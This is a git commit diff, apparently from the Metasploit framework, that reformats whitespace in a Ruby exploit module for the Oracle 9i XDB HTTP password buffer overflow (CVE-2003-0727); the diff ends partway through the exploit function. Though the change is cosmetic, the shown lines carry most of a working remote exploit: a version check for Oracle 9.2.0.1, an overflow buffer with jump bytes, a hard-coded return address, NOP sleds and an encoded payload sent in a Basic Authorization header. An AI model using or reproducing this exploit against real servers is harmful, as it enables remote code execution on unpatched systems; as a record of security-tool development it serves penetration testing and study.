fixed spacing...

git-svn-id: file:///home/svn/framework3/trunk@4137 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2006-11-15 01:02:04 +00:00 · 2006-11-15 01:02:04 +00:00 · dbb3cf8482
commit dbb3cf8482
parent dd8c1d3ffe
1 changed files with 20 additions and 21 deletions
--- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb
+++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb
@ -24,14 +24,13 @@ class Exploits::Windows::Http::Oracle9i_Xdb_Pass < Msf::Exploit::Remote
 				[
 	  				['OSVDB', '2449'],
 					['BID', '8375'],
-                                        ['CVE', '2003-0727'],
+					['CVE', '2003-0727'],
 					['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
 				],
-                        'DefaultOptions' =>
-                                {
-                                        'EXITFUNC' => 'thread',
-                                },
-
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
 			'Privileged'     => true,
 			'Payload'        =>
 				{
@ -44,34 +43,34 @@ class Exploits::Windows::Http::Oracle9i_Xdb_Pass < Msf::Exploit::Remote
 				[
 					[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],
 				],
-                        'DefaultTarget' => 0,
+			'DefaultTarget'  => 0,			
 			'DisclosureDate' => 'Aug 18 2003'))
 			
 			register_options( [ Opt::RPORT(8080) ], self.class )

 	end

-        def check
-                connect
-                sock.put("GET / HTTP/1.0\r\n\r\n")
-                resp = sock.get_once
-                disconnect
+	def check
+		connect
+		sock.put("GET / HTTP/1.0\r\n\r\n")
+		resp = sock.get_once
+		disconnect
 
-                if (resp =~ /9.2.0.1.0/)
-                        return Exploit::CheckCode::Vulnerable
-                end                                                                               
-                        return Exploit::CheckCode::Safe
-        end
+		if (resp =~ /9.2.0.1.0/)
+			return Exploit::CheckCode::Vulnerable
+		end                                                                               
+			return Exploit::CheckCode::Safe
+	end

 	def exploit
 		connect

-                sploit =  Rex::Text.rand_text_english(4, payload_badchars) + ":" 
+		sploit =  Rex::Text.rand_text_english(4, payload_badchars) + ":" 
 		sploit << Rex::Text.rand_text_english(442, payload_badchars) 
-                sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V') 
-                sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded
+		sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V') 
+		sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded

-                req  = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"  
+		req  = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"  
 		
 		res  = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req